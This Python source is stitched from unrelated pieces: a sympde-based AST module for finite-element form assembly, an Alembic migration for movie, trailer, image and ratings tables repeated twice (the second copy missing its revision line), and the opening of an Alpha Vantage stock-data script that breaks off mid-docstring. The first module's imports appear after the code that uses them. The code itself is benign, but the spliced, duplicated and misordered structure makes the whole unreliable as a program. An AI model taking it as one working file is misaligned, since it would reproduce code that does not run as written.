    def __new__(cls, pads):
        if not isinstance(pads, (list, tuple, Tuple)):
            raise TypeError('Expecting an iterable')

        pads = Tuple(*pads)
        rank = 2*len(pads)
        # random tag to distinguish otherwise-identical instances
        tag  = random_string( 6 )
        return Basic.__new__(cls, pads, rank, tag)

    @property
    def pads(self):
        return self._args[0]

    @property
    def rank(self):
        return self._args[1]

    @property
    def tag(self):
        return self._args[2]

#==============================================================================
class StencilVectorGlobalBasis(MatrixNode):
    """
    used to describe global dofs as a stencil vector
    """
    def __new__(cls, pads):
        if not isinstance(pads, (list, tuple, Tuple)):
            raise TypeError('Expecting an iterable')

        pads = Tuple(*pads)
        rank = len(pads)
        # random tag to distinguish otherwise-identical instances
        tag  = random_string( 6 )
        return Basic.__new__(cls, pads, rank, tag)

    @property
    def pads(self):
        return self._args[0]

    @property
    def rank(self):
        return self._args[1]

    @property
    def tag(self):
        return self._args[2]
#==============================================================================
class GlobalSpan(ArrayNode):
    """
    Spans (last non-vanishing basis function per element) for the whole
    mesh, indexed by element.
    """
    _rank = 1
    _positions = {index_element: 0}

    def __new__(cls, target):
        if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
            raise TypeError('Expecting a scalar/vector test function')
        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]

#==============================================================================
class Span(ScalarNode):
    """
    Span for a single element; *target* may be None.
    """
    def __new__(cls, target=None):
        if not( target is None ):
            if not isinstance(target, (ScalarTestFunction, VectorTestFunction)):
                raise TypeError('Expecting a scalar/vector test function')

        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]
#==============================================================================
class Evaluation(BaseNode):
    """
    Base class of evaluation nodes.
    """
    pass

#==============================================================================
class FieldEvaluation(Evaluation):
    """
    Evaluation of a field.
    """
    pass

#==============================================================================
class MappingEvaluation(Evaluation):
    """
    Evaluation of a mapping.
    """
    pass
#==============================================================================
class ComputeNode(Basic):
    """
    Statement node: compute the wrapped expression.
    """
    def __new__(cls, expr):
        return Basic.__new__(cls, expr)

    @property
    def expr(self):
        return self._args[0]

#==============================================================================
class ComputePhysical(ComputeNode):
    """
    Compute an expression in physical coordinates.
    """
    pass

#==============================================================================
class ComputePhysicalBasis(ComputePhysical):
    """
    Compute a physical basis expression.
    """
    pass

#==============================================================================
class ComputeKernelExpr(ComputeNode):
    """
    Compute the kernel (terminal) expression.
    """
    pass

#==============================================================================
class ComputeLogical(ComputeNode):
    """
    Compute an expression in logical coordinates.
    """
    pass

#==============================================================================
class ComputeLogicalBasis(ComputeLogical):
    """
    Compute a logical basis expression.
    """
    pass
#==============================================================================
class Reduction(Basic):
    """
    In-place reduction ``lhs op= expr`` (lhs may be None).
    """
    def __new__(cls, op, expr, lhs=None):
        # TODO add verification on op = '-', '+', '*', '/'
        return Basic.__new__(cls, op, expr, lhs)

    @property
    def op(self):
        return self._args[0]

    @property
    def expr(self):
        return self._args[1]

    @property
    def lhs(self):
        return self._args[2]

#==============================================================================
class Reduce(Basic):
    """
    Reduce ``rhs`` into ``lhs`` with operator ``op`` over the given loop.
    """
    def __new__(cls, op, rhs, lhs, loop):
        # TODO add verification on op = '-', '+', '*', '/'
        if not isinstance(loop, Loop):
            raise TypeError('Expecting a Loop')

        return Basic.__new__(cls, op, rhs, lhs, loop)

    @property
    def op(self):
        return self._args[0]

    @property
    def rhs(self):
        return self._args[1]

    @property
    def lhs(self):
        return self._args[2]

    @property
    def loop(self):
        return self._args[3]

#==============================================================================
class Reset(Basic):
    """
    Statement node: reset (zero out) the wrapped expression.
    """
    def __new__(cls, expr):
        return Basic.__new__(cls, expr)

    @property
    def expr(self):
        return self._args[0]

#==============================================================================
class ElementOf(Basic):
    """
    A single element (entry) of the wrapped target.
    """
    def __new__(cls, target):
        return Basic.__new__(cls, target)

    @property
    def target(self):
        return self._args[0]
#==============================================================================
class ExprNode(Basic):
    """
    Base class of expression nodes.
    """
    pass

#==============================================================================
class AtomicNode(ExprNode, AtomicExpr):
    """
    An atomic expression node.
    """
    @property
    def expr(self):
        return self._args[0]

#==============================================================================
class ValueNode(ExprNode):
    """
    The value of the wrapped expression.
    """
    def __new__(cls, expr):
        return Basic.__new__(cls, expr)

    @property
    def expr(self):
        return self._args[0]

#==============================================================================
class PhysicalValueNode(ValueNode):
    """
    Value expressed in physical coordinates.
    """
    pass

#==============================================================================
class LogicalValueNode(ValueNode):
    """
    Value expressed in logical coordinates.
    """
    pass

#==============================================================================
class PhysicalBasisValue(PhysicalValueNode):
    """
    Physical value of a basis function.
    """
    pass

#==============================================================================
class LogicalBasisValue(LogicalValueNode):
    """
    Logical value of a basis function.
    """
    pass

#==============================================================================
class PhysicalGeometryValue(PhysicalValueNode):
    """
    Physical value of a geometry quantity.
    """
    pass

#==============================================================================
class LogicalGeometryValue(LogicalValueNode):
    """
    Logical value of a geometry quantity.
    """
    pass
#==============================================================================
class BasisAtom(AtomicNode):
    """
    Atomic expression that contains exactly one scalar/vector test
    function; the test function is available through ``atom``.
    """
    def __new__(cls, expr):
        ls  = list(expr.atoms(ScalarTestFunction))
        ls += list(expr.atoms(VectorTestFunction))
        if not(len(ls) == 1):
            # report the offending expression in the error itself instead
            # of printing debug output to stdout before raising
            raise ValueError(
                'Expecting an expression with one test function, '
                'got {} in {!r} (type {})'.format(ls, expr, type(expr)))
        u = ls[0]

        obj = Basic.__new__(cls, expr)
        obj._atom = u
        return obj

    @property
    def expr(self):
        return self._args[0]

    @property
    def atom(self):
        return self._atom
#==============================================================================
class GeometryAtom(AtomicNode):
    """
    Atomic expression that contains exactly one Mapping; the mapping is
    available through ``atom``.
    """
    def __new__(cls, expr):
        ls = list(expr.atoms(Mapping))
        if not(len(ls) == 1):
            # report the offending expression in the error itself instead
            # of printing debug output to stdout before raising
            raise ValueError(
                'Expecting an expression with one mapping, '
                'got {} in {!r} (type {})'.format(ls, expr, type(expr)))

        # TODO
        u = ls[0]

        obj = Basic.__new__(cls, expr)
        obj._atom = u
        return obj

    @property
    def expr(self):
        return self._args[0]

    @property
    def atom(self):
        return self._atom
#==============================================================================
class GeometryExpr(Basic):
    """
    Pair (GeometryAtom, MatrixQuadrature) built from a geometry expression:
    the atom identifies the mapping, the expr its values at quadrature
    points.
    """
    def __new__(cls, expr):
        # TODO assert on expr
        atom = GeometryAtom(expr)
        expr = MatrixQuadrature(expr)

        return Basic.__new__(cls, atom, expr)

    @property
    def atom(self):
        return self._args[0]

    @property
    def expr(self):
        return self._args[1]
#==============================================================================
class Loop(BaseNode):
    """
    class to describe a loop of an iterator over a generator.

    *iterable* is one node or a sequence of nodes to traverse, *index*
    the IndexNode along which to iterate, and *stmts* the loop body.
    """
    def __new__(cls, iterable, index, stmts=None):
        # ... normalize iterable to a Tuple
        if not( isinstance(iterable, (list, tuple, Tuple)) ):
            iterable = [iterable]

        iterable = Tuple(*iterable)
        # ...

        # ... replace GeometryExpressions by a list of expressions
        others = [i for i in iterable if not isinstance(i, GeometryExpressions)]
        geos   = [i.arguments for i in iterable if isinstance(i, GeometryExpressions)]
        # (removed unused `with_geo` flag that was marked TODO remove)
        if len(geos) == 1:
            geos = list(geos[0])

        elif len(geos) > 1:
            raise NotImplementedError('TODO')

        iterable = others + geos
        iterable = Tuple(*iterable)
        # ...

        # ... include the offending value in the error instead of printing
        if not( isinstance(index, IndexNode) ):
            raise TypeError('Expecting an index node, '
                            'got {} ({})'.format(index, type(index)))
        # ...

        # ... TODO - add assert w.r.t index type
        #          - this should be splitted/moved somewhere
        iterator  = []
        generator = []
        for a in iterable:
            i, g = construct_itergener(a, index)
            iterator.append(i)
            generator.append(g)
        # ...

        # ...
        iterator  = Tuple(*iterator)
        generator = Tuple(*generator)
        # ...

        # ... normalize stmts to a Tuple
        if stmts is None:
            stmts = []

        elif not isinstance(stmts, (tuple, list, Tuple)):
            stmts = [stmts]

        stmts = Tuple(*stmts)
        # ...

        obj = Basic.__new__(cls, iterable, index, stmts)
        obj._iterator  = iterator
        obj._generator = generator

        return obj

    @property
    def iterable(self):
        return self._args[0]

    @property
    def index(self):
        return self._args[1]

    @property
    def stmts(self):
        return self._args[2]

    @property
    def iterator(self):
        return self._iterator

    @property
    def generator(self):
        return self._generator

    def get_geometry_stmts(self, mapping):
        """Return the geometry-related statements of this loop, depending
        on whether *mapping* is the identity."""
        l_quad = list(self.generator.atoms(LocalTensorQuadrature))
        if len(l_quad) == 0:
            return Tuple()

        assert len(l_quad) == 1
        l_quad = l_quad[0]

        # the weighted volume is needed in both cases (was duplicated in
        # each branch)
        args = [ComputeLogical(WeightedVolumeQuadrature(l_quad))]
        if isinstance(mapping, IdentityMapping):
            return Tuple(*args)

        # add stmts related to the geometry
        # TODO add other expressions
        args += [ComputeLogical(SymbolicDeterminant(mapping))]
        args += [ComputeLogical(SymbolicInverseDeterminant(mapping))]
        args += [ComputeLogical(SymbolicWeightedVolume(mapping))]

        return Tuple(*args)
#==============================================================================
class TensorIteration(BaseNode):
    """
    Pairing of a TensorIterator with a TensorGenerator.
    """
    def __new__(cls, iterator, generator):
        # ... type checks (error messages fixed: "an TensorIterator" ->
        # "a TensorIterator")
        if not( isinstance(iterator, TensorIterator) ):
            raise TypeError('Expecting a TensorIterator')

        if not( isinstance(generator, TensorGenerator) ):
            raise TypeError('Expecting a TensorGenerator')
        # ...

        return Basic.__new__(cls, iterator, generator)

    @property
    def iterator(self):
        return self._args[0]

    @property
    def generator(self):
        return self._args[1]
#==============================================================================
class ProductIteration(BaseNode):
    """
    Pairing of a ProductIterator with a ProductGenerator.
    """
    def __new__(cls, iterator, generator):
        # ... type checks (error messages fixed: "an ProductIterator" ->
        # "a ProductIterator")
        if not( isinstance(iterator, ProductIterator) ):
            raise TypeError('Expecting a ProductIterator')

        if not( isinstance(generator, ProductGenerator) ):
            raise TypeError('Expecting a ProductGenerator')
        # ...

        return Basic.__new__(cls, iterator, generator)

    @property
    def iterator(self):
        return self._args[0]

    @property
    def generator(self):
        return self._args[1]
#==============================================================================
class SplitArray(BaseNode):
    """
    Node describing how to split *target* at the given positions into
    chunks of the given lengths.
    """
    def __new__(cls, target, positions, lengths):
        # Normalize both arguments to sympy Tuples, accepting scalars too.
        if not isinstance(positions, (list, tuple, Tuple)):
            positions = [positions]
        if not isinstance(lengths, (list, tuple, Tuple)):
            lengths = [lengths]
        return Basic.__new__(cls, target, Tuple(*positions), Tuple(*lengths))

    @property
    def target(self):
        # Array-like object being split.
        return self._args[0]

    @property
    def positions(self):
        # Tuple of split positions.
        return self._args[1]

    @property
    def lengths(self):
        # Tuple of chunk lengths, parallel to *positions*.
        return self._args[2]
#==============================================================================
def construct_logical_expressions(u, nderiv):
    """Return ComputeLogicalBasis nodes for *u* and every logical
    derivative of *u* up to total order *nderiv*."""
    dim = u.space.ldim
    ops = [dx1, dx2, dx3][:dim]

    # All multi-indices (i1, ..., idim) with i1 + ... + idim <= nderiv.
    multi_indices = [ijk for ijk in product(range(nderiv + 1), repeat=dim)
                     if sum(ijk) <= nderiv]

    atoms = []
    for ijk in multi_indices:
        atom = u
        # Apply each logical derivative operator the requested number of times.
        for order, op in zip(ijk, ops):
            for _ in range(order):
                atom = op(atom)
        atoms.append(atom)

    return [ComputeLogicalBasis(a) for a in atoms]
#==============================================================================
class GeometryExpressions(Basic):
    """
    Collection of GeometryExpr nodes: every component of the mapping *M*
    together with all its logical derivatives up to total order *nderiv*.
    """
    def __new__(cls, M, nderiv):
        dim = M.rdim
        ops = [dx1, dx2, dx3][:dim]

        # Multi-indices of total derivative order <= nderiv.
        multi_indices = [ijk for ijk in product(range(nderiv + 1), repeat=dim)
                         if sum(ijk) <= nderiv]

        expressions = []
        for d in range(dim):
            for ijk in multi_indices:
                atom = M[d]
                # Apply each derivative operator the requested number of times.
                for order, op in zip(ijk, ops):
                    for _ in range(order):
                        atom = op(atom)
                expressions.append(atom)

        wrapped = Tuple(*[GeometryExpr(e) for e in expressions])
        return Basic.__new__(cls, wrapped)

    @property
    def arguments(self):
        # Tuple of GeometryExpr nodes built at construction.
        return self._args[0]
#==============================================================================
def construct_itergener(a, index):
    """
    Create the (iterator, generator) pair associated with the node *a*
    iterated with the loop index *index*.

    The generator wraps *a* itself; the iterator wraps the "element"
    that one step of the iteration yields.

    Raises
    ------
    TypeError
        If *a* (or the derived element) is of an unsupported type.
    """
    # ... create generator and the element it yields.
    # NOTE: the order of these checks matters — the more specific
    # Trial/Test basis classes must be tested before the generic ones.
    if isinstance(a, GlobalTensorQuadrature):
        generator = TensorGenerator(a, index)
        element = LocalTensorQuadrature()
    elif isinstance(a, LocalTensorQuadrature):
        generator = TensorGenerator(a, index)
        element = TensorQuadrature()
    elif isinstance(a, GlobalTensorQuadratureTrialBasis):
        generator = TensorGenerator(a, index)
        element = LocalTensorQuadratureTrialBasis(a.target)
    elif isinstance(a, LocalTensorQuadratureTrialBasis):
        generator = TensorGenerator(a, index)
        element = TensorQuadratureTrialBasis(a.target)
    elif isinstance(a, TensorQuadratureTrialBasis):
        generator = TensorGenerator(a, index)
        element = TensorTrialBasis(a.target)
    elif isinstance(a, GlobalTensorQuadratureTestBasis):
        generator = TensorGenerator(a, index)
        element = LocalTensorQuadratureTestBasis(a.target)
    elif isinstance(a, LocalTensorQuadratureTestBasis):
        generator = TensorGenerator(a, index)
        element = TensorQuadratureTestBasis(a.target)
    elif isinstance(a, TensorQuadratureTestBasis):
        generator = TensorGenerator(a, index)
        element = TensorTestBasis(a.target)
    elif isinstance(a, GlobalTensorQuadratureBasis):
        generator = TensorGenerator(a, index)
        element = LocalTensorQuadratureBasis(a.target)
    elif isinstance(a, LocalTensorQuadratureBasis):
        generator = TensorGenerator(a, index)
        element = TensorQuadratureBasis(a.target)
    elif isinstance(a, TensorQuadratureBasis):
        generator = TensorGenerator(a, index)
        element = TensorBasis(a.target)
    elif isinstance(a, GlobalSpan):
        generator = TensorGenerator(a, index)
        element = Span(a.target)
    elif isinstance(a, MatrixLocalBasis):
        generator = ProductGenerator(a, index)
        element = CoefficientBasis(a.target)
    elif isinstance(a, GeometryExpr):
        generator = ProductGenerator(a.expr, index)
        element = a.atom
    else:
        raise TypeError('{} not available'.format(type(a)))
    # ...

    # ... create iterator.
    # All tensor-product elements are traversed with a TensorIterator,
    # pointwise elements with a ProductIterator.  (Collapses the original
    # twelve identical elif branches; safe because every branch built the
    # same TensorIterator(element) regardless of subclass ordering.)
    tensor_element_types = (LocalTensorQuadrature,
                            TensorQuadrature,
                            LocalTensorQuadratureTrialBasis,
                            TensorQuadratureTrialBasis,
                            TensorTrialBasis,
                            LocalTensorQuadratureTestBasis,
                            TensorQuadratureTestBasis,
                            TensorTestBasis,
                            LocalTensorQuadratureBasis,
                            TensorQuadratureBasis,
                            TensorBasis,
                            Span)
    if isinstance(element, tensor_element_types):
        iterator = TensorIterator(element)
    elif isinstance(element, (CoefficientBasis, GeometryAtom)):
        iterator = ProductIterator(element)
    else:
        raise TypeError('{} not available'.format(type(element)))
    # ...
    return iterator, generator
#==============================================================================
class Block(Basic):
    """
    A sequence of statements grouped into a single node.
    """
    def __new__(cls, body):
        # Accept a single statement or any sequence of statements.
        if not isinstance(body, (list, tuple, Tuple)):
            body = [body]
        return Basic.__new__(cls, Tuple(*body))

    @property
    def body(self):
        # Tuple of statements in execution order.
        return self._args[0]
#==============================================================================
def is_scalar_field(expr):
    """Return True if *expr* is a ScalarField, possibly wrapped in
    (logical) partial derivatives."""
    if isinstance(expr, (_partial_derivatives, _logical_partial_derivatives)):
        # Unwrap the derivative and look at its operand.
        return is_scalar_field(expr.args[0])
    return isinstance(expr, ScalarField)
#==============================================================================
def is_vector_field(expr):
    """Return True if *expr* is a (possibly indexed) VectorField, possibly
    wrapped in (logical) partial derivatives."""
    if isinstance(expr, (_partial_derivatives, _logical_partial_derivatives)):
        # Unwrap the derivative and look at its operand.
        return is_vector_field(expr.args[0])
    return isinstance(expr, (VectorField, IndexedVectorField))
#==============================================================================
from sympy import Matrix, ImmutableDenseMatrix
from sympy import symbols
from pyccel.ast.core import _atomic
from sympde.expr import TerminalExpr
from sympde.expr import LinearForm
from sympde.expr import BilinearForm
from sympde.topology import element_of
from sympde.topology import ScalarField
from sympde.topology import VectorField, IndexedVectorField
from sympde.topology.space import ScalarTestFunction
from sympde.topology.space import VectorTestFunction
from sympde.topology.space import IndexedTestTrial
from sympde.topology.derivatives import _partial_derivatives
from sympde.topology.derivatives import _logical_partial_derivatives
from sympde.topology.derivatives import get_max_partial_derivatives
class AST(object):
    """
    Abstract syntax tree of the assembly code for a linear or bilinear
    form.  From a sympde expression it derives the terminal expression,
    the maximal derivative order, per-test/trial basis descriptors, and
    finally the full loop nest via _create_ast_linear_form /
    _create_ast_bilinear_form.
    """
    def __init__(self, expr):
        # ... compute terminal expr
        # TODO check that we have one single domain/interface/boundary
        terminal_expr = TerminalExpr(expr)
        domain = terminal_expr[0].target
        terminal_expr = terminal_expr[0].expr
        # print('> terminal expr = ', terminal_expr)
        # ...
        # ... compute max deriv
        # Scan every entry (matrix case) for the highest partial-derivative
        # order appearing in the terminal expression.
        nderiv = 0
        if isinstance(terminal_expr, Matrix):
            n_rows, n_cols = terminal_expr.shape
            for i_row in range(0, n_rows):
                for i_col in range(0, n_cols):
                    d = get_max_partial_derivatives(terminal_expr[i_row,i_col])
                    nderiv = max(nderiv, max(d.values()))
        else:
            d = get_max_partial_derivatives(terminal_expr)
            nderiv = max(nderiv, max(d.values()))
        # print('> nderiv = ', nderiv)
        # ...
        # ...
        # Classify the form; only linear and bilinear are supported
        # (is_functional is declared but not yet implemented).
        is_bilinear = False
        is_linear = False
        is_functional = False
        tests = []
        trials = []
        if isinstance(expr, LinearForm):
            is_linear = True
            tests = expr.test_functions
        elif isinstance(expr, BilinearForm):
            is_bilinear = True
            tests = expr.test_functions
            trials = expr.trial_functions
        else:
            raise NotImplementedError('TODO')
        # ...
        # ...
        # Atomic sub-expressions of interest: derivatives, test functions
        # and (scalar/vector) fields.
        atoms_types = (_partial_derivatives,
                       VectorTestFunction,
                       ScalarTestFunction,
                       IndexedTestTrial,
                       ScalarField,
                       VectorField, IndexedVectorField)
        atoms = _atomic(expr, cls=atoms_types)
        # ...
        # ...
        # Split the atoms into scalar fields, vector fields and the rest
        # (test/trial basis atoms).
        atomic_expr_field = [atom for atom in atoms if is_scalar_field(atom)]
        atomic_expr_vector_field = [atom for atom in atoms if is_vector_field(atom)]
        atomic_expr = [atom for atom in atoms if not( atom in atomic_expr_field ) and
                       not( atom in atomic_expr_vector_field)]
        # ...
        # ...
        # Basis/span descriptors for every test function, keyed by the
        # granularity at which they are consumed in the loop nest.
        d_tests = {}
        for v in tests:
            d = {}
            d['global'] = GlobalTensorQuadratureTestBasis(v)
            d['local'] = LocalTensorQuadratureTestBasis(v)
            d['array'] = TensorQuadratureTestBasis(v)
            d['basis'] = TensorTestBasis(v)
            d['span'] = GlobalSpan(v)
            d_tests[v] = d
        # ...
        # ...
        # Same descriptors for every trial function (bilinear case).
        d_trials = {}
        for v in trials:
            d = {}
            d['global'] = GlobalTensorQuadratureTrialBasis(v)
            d['local'] = LocalTensorQuadratureTrialBasis(v)
            d['array'] = TensorQuadratureTrialBasis(v)
            d['basis'] = TensorTrialBasis(v)
            d['span'] = GlobalSpan(v)
            d_trials[v] = d
        # ...
        # ...
        # Build the actual loop-nest AST.
        if is_linear:
            ast = _create_ast_linear_form(terminal_expr, atomic_expr, tests, d_tests,
                                          nderiv, domain.dim)
        elif is_bilinear:
            ast = _create_ast_bilinear_form(terminal_expr, atomic_expr,
                                            tests, d_tests,
                                            trials, d_trials,
                                            nderiv, domain.dim)
        else:
            raise NotImplementedError('TODO')
        # ...
        self._expr = ast
        self._nderiv = nderiv
        self._domain = domain

    @property
    def expr(self):
        # The generated loop-nest AST.
        return self._expr

    @property
    def nderiv(self):
        # Maximal derivative order appearing in the terminal expression.
        return self._nderiv

    @property
    def domain(self):
        # Domain the form is defined on.
        return self._domain

    @property
    def dim(self):
        # Topological dimension of the domain.
        return self.domain.dim
#==============================================================================
def _create_ast_linear_form(terminal_expr, atomic_expr, tests, d_tests, nderiv, dim):
    """
    Build the loop nest assembling a linear form:
    reset global vector -> loop over elements -> reset local vector ->
    loop over test dofs -> loop over quadrature points -> reduce the
    kernel expression into the local vector, then reduce the local
    vector into the global one.
    """
    pads = symbols('p1, p2, p3')[:dim]
    g_quad = GlobalTensorQuadrature()
    l_quad = LocalTensorQuadrature()
    # ...
    # Statements executed at each quadrature point: logical derivatives
    # of every test function plus the physical basis values.
    stmts = []
    for v in tests:
        stmts += construct_logical_expressions(v, nderiv)
    stmts += [ComputePhysicalBasis(i) for i in atomic_expr]
    # ...
    # ...
    # Innermost loop: over quadrature points.
    a_basis = tuple([d['array'] for v,d in d_tests.items()])
    loop = Loop((l_quad, *a_basis), index_quad, stmts)
    # ...
    # ... TODO
    l_vec = StencilVectorLocalBasis(pads)
    # ...
    # ...
    # Accumulate the kernel expression into the local vector element.
    loop = Reduce('+', ComputeKernelExpr(terminal_expr), ElementOf(l_vec), loop)
    # ...
    # ... loop over tests
    l_basis = tuple([d['local'] for v,d in d_tests.items()])
    stmts = [loop]
    loop = Loop(l_basis, index_dof_test, stmts)
    # ...
    # ... TODO
    # Reset the local vector before each element's accumulation.
    body = (Reset(l_vec), loop)
    stmts = Block(body)
    # ...
    # ...
    # Outermost loop: over mesh elements, advancing bases and spans.
    g_basis = tuple([d['global'] for v,d in d_tests.items()])
    g_span = tuple([d['span'] for v,d in d_tests.items()])
    loop = Loop((g_quad, *g_basis, *g_span), index_element, stmts)
    # ...
    # ... TODO
    g_vec = StencilVectorGlobalBasis(pads)
    # ...
    # ... TODO
    # Reset the global vector, then reduce every local vector into it.
    body = (Reset(g_vec), Reduce('+', l_vec, g_vec, loop))
    stmt = Block(body)
    # ...
    return stmt
#==============================================================================
def _create_ast_bilinear_form(terminal_expr, atomic_expr,
                              tests, d_tests,
                              trials, d_trials,
                              nderiv, dim):
    """
    Build the loop nest assembling a bilinear form:
    reset global matrix -> loop over elements -> reset local matrix ->
    loop over test dofs -> loop over trial dofs -> loop over quadrature
    points -> reduce the kernel expression into the local matrix, then
    reduce the local matrix into the global one.
    """
    pads = symbols('p1, p2, p3')[:dim]
    g_quad = GlobalTensorQuadrature()
    l_quad = LocalTensorQuadrature()
    # ...
    # Statements executed at each quadrature point.  NOTE(review): only
    # the *test* functions get logical-derivative statements here, unlike
    # the quadrature loop which advances both bases — confirm trials are
    # covered via atomic_expr.
    stmts = []
    for v in tests:
        stmts += construct_logical_expressions(v, nderiv)
    stmts += [ComputePhysicalBasis(i) for i in atomic_expr]
    # ...
    # ...
    # Innermost loop: over quadrature points, advancing both bases.
    a_basis_tests = tuple([d['array'] for v,d in d_tests.items()])
    a_basis_trials = tuple([d['array'] for v,d in d_trials.items()])
    loop = Loop((l_quad, *a_basis_tests, *a_basis_trials), index_quad, stmts)
    # ...
    # ... TODO
    l_mat = StencilMatrixLocalBasis(pads)
    # ...
    # ...
    # Accumulate the kernel expression into the local matrix element.
    loop = Reduce('+', ComputeKernelExpr(terminal_expr), ElementOf(l_mat), loop)
    # ...
    # ... loop over trials
    l_basis = tuple([d['local'] for v,d in d_trials.items()])
    stmts = [loop]
    loop = Loop(l_basis, index_dof_trial, stmts)
    # ...
    # ... loop over tests
    l_basis = tuple([d['local'] for v,d in d_tests.items()])
    stmts = [loop]
    loop = Loop(l_basis, index_dof_test, stmts)
    # ...
    # ... TODO
    # Reset the local matrix before each element's accumulation.
    body = (Reset(l_mat), loop)
    stmts = Block(body)
    # ...
    # ...
    g_basis_tests = tuple([d['global'] for v,d in d_tests.items()])
    g_basis_trials = tuple([d['global'] for v,d in d_trials.items()])
    # TODO d_trials or d_tests here?
    # NOTE(review): the linear-form builder uses the *test* spans; using
    # d_trials here is only equivalent when test and trial spaces match —
    # confirm.
    g_span = tuple([d['span'] for v,d in d_trials.items()])
    loop = Loop((g_quad, *g_basis_tests, *g_basis_trials, *g_span),
                index_element, stmts)
    # ...
    # ... TODO
    g_mat = StencilMatrixGlobalBasis(pads)
    # ...
    # ... TODO
    # Reset the global matrix, then reduce every local matrix into it.
    body = (Reset(g_mat), Reduce('+', l_mat, g_mat, loop))
    stmt = Block(body)
    # ...
    return stmt
# Alembic revision identifiers (placeholder values redacted from the
# original migration file).
revision = '<KEY>'
down_revision = '<PASSWORD>'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Create the movies, trailers, images and ratings tables."""
    # Parent table; every other table references movies.movie_id.
    op.create_table(
        'movies',
        sa.Column('name', sa.String(length=145), nullable=False),
        sa.Column('summary', sa.String(length=3000), nullable=True),
        sa.Column('create_time', sa.DateTime(), nullable=False),
        sa.Column('update_time', sa.DateTime(), nullable=False),
        sa.Column('in_theaters', sa.Integer(), nullable=True),
        sa.Column('movie_id', sa.Integer(), nullable=False, unique=True),
        sa.PrimaryKeyConstraint('movie_id')
    )
    # NOTE(review): trailers and images define no primary key — confirm
    # this is intentional.
    op.create_table(
        'trailers',
        sa.Column('url',sa.String(length=2083), nullable=False),
        sa.Column('file',sa.String(length=96), nullable=False, unique=True),
        sa.Column('create_time', sa.DateTime(), nullable=False),
        sa.Column('update_time', sa.DateTime(), nullable=False),
        sa.Column('movies_movie_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(['movies_movie_id'], ['movies.movie_id'], )
    )
    op.create_table(
        'images',
        sa.Column('url',sa.String(length=2083), nullable=False),
        sa.Column('file',sa.String(length=96), nullable=False, unique=True),
        sa.Column('create_time', sa.DateTime(), nullable=False),
        sa.Column('update_time', sa.DateTime(), nullable=False),
        sa.Column('movies_movie_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(['movies_movie_id'], ['movies.movie_id'], )
    )
    # Ratings link users to movies; 'id' is unique but not declared as a
    # primary key (NOTE(review): confirm).  References the pre-existing
    # 'users' table, which is not created by this migration.
    op.create_table(
        'ratings',
        sa.Column('rating', sa.Integer(), nullable=False),
        sa.Column('create_time', sa.DateTime(), nullable=False),
        sa.Column('update_time', sa.DateTime(), nullable=False),
        sa.Column('movies_movie_id', sa.Integer(), nullable=False),
        sa.Column('users_id', sa.Integer(), nullable=False),
        sa.Column('id', sa.Integer(), nullable=False, unique=True),
        sa.ForeignKeyConstraint(['users_id'], ['users.id'], ),
        sa.ForeignKeyConstraint(['movies_movie_id'], ['movies.movie_id'], )
    )
def downgrade():
    """Drop the tables created by upgrade(), children first.

    BUGFIX: the original dropped 'movies' first, which fails on databases
    enforcing foreign keys because trailers, images and ratings all hold
    FKs into movies.movie_id.  Drop in reverse dependency order instead.
    """
    op.drop_table('ratings')
    op.drop_table('trailers')
    op.drop_table('images')
    op.drop_table('movies')
down_revision = '<PASSWORD>'
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Create the movies, trailers, images and ratings tables."""
    # Parent table; every other table references movies.movie_id.
    op.create_table(
        'movies',
        sa.Column('name', sa.String(length=145), nullable=False),
        sa.Column('summary', sa.String(length=3000), nullable=True),
        sa.Column('create_time', sa.DateTime(), nullable=False),
        sa.Column('update_time', sa.DateTime(), nullable=False),
        sa.Column('in_theaters', sa.Integer(), nullable=True),
        sa.Column('movie_id', sa.Integer(), nullable=False, unique=True),
        sa.PrimaryKeyConstraint('movie_id')
    )
    # NOTE(review): trailers and images define no primary key — confirm
    # this is intentional.
    op.create_table(
        'trailers',
        sa.Column('url',sa.String(length=2083), nullable=False),
        sa.Column('file',sa.String(length=96), nullable=False, unique=True),
        sa.Column('create_time', sa.DateTime(), nullable=False),
        sa.Column('update_time', sa.DateTime(), nullable=False),
        sa.Column('movies_movie_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(['movies_movie_id'], ['movies.movie_id'], )
    )
    op.create_table(
        'images',
        sa.Column('url',sa.String(length=2083), nullable=False),
        sa.Column('file',sa.String(length=96), nullable=False, unique=True),
        sa.Column('create_time', sa.DateTime(), nullable=False),
        sa.Column('update_time', sa.DateTime(), nullable=False),
        sa.Column('movies_movie_id', sa.Integer(), nullable=False),
        sa.ForeignKeyConstraint(['movies_movie_id'], ['movies.movie_id'], )
    )
    # Ratings link users to movies; 'id' is unique but not declared as a
    # primary key (NOTE(review): confirm).  References the pre-existing
    # 'users' table, which is not created by this migration.
    op.create_table(
        'ratings',
        sa.Column('rating', sa.Integer(), nullable=False),
        sa.Column('create_time', sa.DateTime(), nullable=False),
        sa.Column('update_time', sa.DateTime(), nullable=False),
        sa.Column('movies_movie_id', sa.Integer(), nullable=False),
        sa.Column('users_id', sa.Integer(), nullable=False),
        sa.Column('id', sa.Integer(), nullable=False, unique=True),
        sa.ForeignKeyConstraint(['users_id'], ['users.id'], ),
        sa.ForeignKeyConstraint(['movies_movie_id'], ['movies.movie_id'], )
    )
def downgrade():
    """Drop the tables created by upgrade(), children first.

    BUGFIX: the original dropped 'movies' first, which fails on databases
    enforcing foreign keys because trailers, images and ratings all hold
    FKs into movies.movie_id.  Drop in reverse dependency order instead.
    """
    op.drop_table('ratings')
    op.drop_table('trailers')
    op.drop_table('images')
    op.drop_table('movies')
from alpha_vantage.timeseries import TimeSeries
from datetime import datetime
import csv
import pandas as pd
import requests
import os
import glob
# Nasdaq company-list download endpoint; {} is filled with the exchange name.
SYMBOL_URL = "http://www.nasdaq.com/screening/companies-by-name.aspx?letter=0&exchange={}&render=download"
# Exchanges whose symbol lists are fetched by get_symbols().
STOCK_EXCHANGES = ["nasdaq", "nyse"]
# Get last 7 days worth of data
def downloadHistory_stocks(symbol, interval='1min'):
    """Fetch full intraday history for *symbol* from Alpha Vantage.

    Side effects: writes the raw DataFrame dump to data/output.txt (kept
    for backward compatibility) and a CSV with a cumulative-VWAP column
